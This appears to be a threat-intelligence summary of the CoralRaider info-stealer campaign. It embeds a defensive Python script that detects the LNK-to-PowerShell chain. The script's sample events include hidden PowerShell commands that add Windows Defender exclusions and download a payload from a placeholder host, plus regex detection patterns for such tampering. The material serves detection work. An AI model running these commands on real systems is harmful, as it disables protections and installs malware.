April 23, 2024 at 05:34PM
A financially motivated threat actor, known as CoralRaider, is conducting an ongoing malware campaign targeting systems in the U.S., U.K., Germany, and Japan. The group uses a content delivery network cache to distribute malware, including info stealers LummaC2, Rhadamanthys, and Cryptbot. The attacks start with malicious Windows shortcut files delivered through various channels. CoralRaider has expanded its targets beyond Asian countries and is now operating in countries such as the U.S., Nigeria, Pakistan, and others.
From the meeting notes, I’ve gathered that a threat actor known as CoralRaider is conducting an ongoing campaign aimed at stealing sensitive information from systems in the U.S., the U.K., Germany, and Japan. They are using a content delivery network (CDN) cache to store and distribute information-stealing malware.
CoralRaider is believed to be a financially motivated threat actor, targeting credentials, financial data, and social media accounts. The info stealers it deploys, LummaC2, Rhadamanthys, and Cryptbot, are sold on malware-as-a-service platforms for a subscription fee; CoralRaider rents them rather than developing its own.
To deliver the malware, CoralRaider starts with an archive containing a malicious Windows shortcut file (.LNK); opening the shortcut runs a PowerShell command embedded in it. The chain relies on obfuscation and deception to avoid detection, including the use of a CDN cache as the malware download server and the addition of Windows Defender exclusions so the downloaded files are not scanned. The attack then bypasses User Account Control (UAC) and installs one of the three info stealers.
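A detection sketch for the chain described above (explorer-launched hidden PowerShell, a Defender exclusion added from that PowerShell, then a download from a web host such as the CDN cache). This is an added example, not code from the original page, from Talos, or from the actor; the log records are constructed Sysmon-style process-creation events with hypothetical host names, paths and a hypothetical domain, and the three-stage correlation window is an assumption, not a published rule.

```python
"""Correlate LNK -> hidden PowerShell -> Defender exclusion -> payload download per host.
Added example; events below are constructed and hypothetical, not real IOCs."""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample telemetry (hypothetical hosts, paths and domain).
SAMPLE_EVENTS = [
    # ws01: the full chain, as a user double-clicking a .LNK would produce it
    {"ts": 100, "host": "ws01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -c '
            '"Add-MpPreference -ExclusionPath $env:APPDATA"'},
    {"ts": 104, "host": "ws01", "parent": "powershell.exe", "image": "powershell.exe",
     "cmd": 'powershell.exe -w hidden -c "iwr https://cdn-cache.example.net/u/p.zip '
            '-OutFile $env:APPDATA/s.zip"'},
    # admin01: an administrator adding an exclusion from a console; no LNK launch, no download
    {"ts": 200, "host": "admin01", "parent": "cmd.exe", "image": "powershell.exe",
     "cmd": r'powershell.exe -c "Add-MpPreference -ExclusionPath D:\Builds"'},
    # ws02: explorer-launched PowerShell with nothing suspicious about it
    {"ts": 300, "host": "ws02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell.exe -NoProfile -c "Get-ChildItem ~"'},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
LNK_LAUNCH_PARENTS = {"explorer.exe"}  # a double-clicked .LNK is started by explorer.exe
# Hidden window, execution-policy bypass, or an encoded command: the flags a .LNK payload needs.
HIDDEN_FLAGS = re.compile(
    r"(?i)-(w(indowstyle)?\s+hidden|e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}|(ep|executionpolicy)\s+bypass)")
# Defender exclusion or real-time protection tampering via the MpPreference cmdlets.
EXCLUSION = re.compile(
    r"(?i)\b(Add|Set)-MpPreference\b.*?-(Exclusion(Path|Extension|Process)|DisableRealtimeMonitoring)")
# Common PowerShell download primitives followed by a URL.
DOWNLOAD = re.compile(
    r"""(?i)\b(iwr|Invoke-WebRequest|DownloadString|DownloadFile|Start-BitsTransfer|curl|wget)\b.*?(https?://[^\s'"()]+)""")
STAGES = ("lnk_powershell", "defender_exclusion", "download")


def classify(event):
    """Tag one process-creation event with the chain stages it exhibits; returns (tags, download_host)."""
    tags, dl_host = set(), None
    if event["image"].lower() not in POWERSHELL:
        return tags, dl_host
    cmd = event["cmd"]
    # The .lnk path is not in the child's command line, so parent explorer.exe plus
    # hidden/bypass/encoded flags stands in for "launched from a shortcut".
    if event["parent"].lower() in LNK_LAUNCH_PARENTS and HIDDEN_FLAGS.search(cmd):
        tags.add("lnk_powershell")
    if EXCLUSION.search(cmd):
        tags.add("defender_exclusion")
    m = DOWNLOAD.search(cmd)
    if m:
        tags.add("download")
        dl_host = urlparse(m.group(2)).hostname
    return tags, dl_host


def correlate(events, window=600):
    """Per host, raise one alert when all three stages occur within `window` seconds."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        tags, dl_host = classify(ev)
        if tags:
            by_host[ev["host"]].append((ev["ts"], tags, dl_host))
    alerts = {}
    for host, hits in by_host.items():
        for i, (t0, _, _) in enumerate(hits):
            seen, dl_hosts = set(), []
            for t, tags, dl_host in hits[i:]:
                if t - t0 > window:
                    break
                seen |= tags
                if dl_host:
                    dl_hosts.append(dl_host)
            if all(s in seen for s in STAGES):
                alerts[host] = {"first_ts": t0, "stages": sorted(seen), "download_hosts": dl_hosts}
                break
    return alerts


if __name__ == "__main__":
    for host, alert in correlate(SAMPLE_EVENTS).items():
        print(host, alert)
```

Only ws01 trips the alert: admin01 shows an exclusion change without the shortcut launch or a download, and ws02 shows an explorer-launched PowerShell without hidden-window or bypass flags. The UAC bypass and the stealer itself are not modelled, since the text above does not name the technique used. Independently of process telemetry, Windows Defender records configuration changes, including new exclusions, in its Operational log (Event ID 5007), which gives a second source for the exclusion stage.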
Furthermore, it’s noted that CoralRaider’s recent attacks have involved fairly recent versions of the info stealers, each with new and advanced features for stealing sensitive data from various applications and sources.
The threat actor has been active since at least 2023 and is believed to be based in Vietnam. Previous campaigns have targeted Asian and Southeast Asian countries, but the latest operation has expanded to include additional countries such as the U.S., Nigeria, Pakistan, and others.
This information provides a comprehensive overview of the threat posed by CoralRaider and the methods they employ for their malicious activities.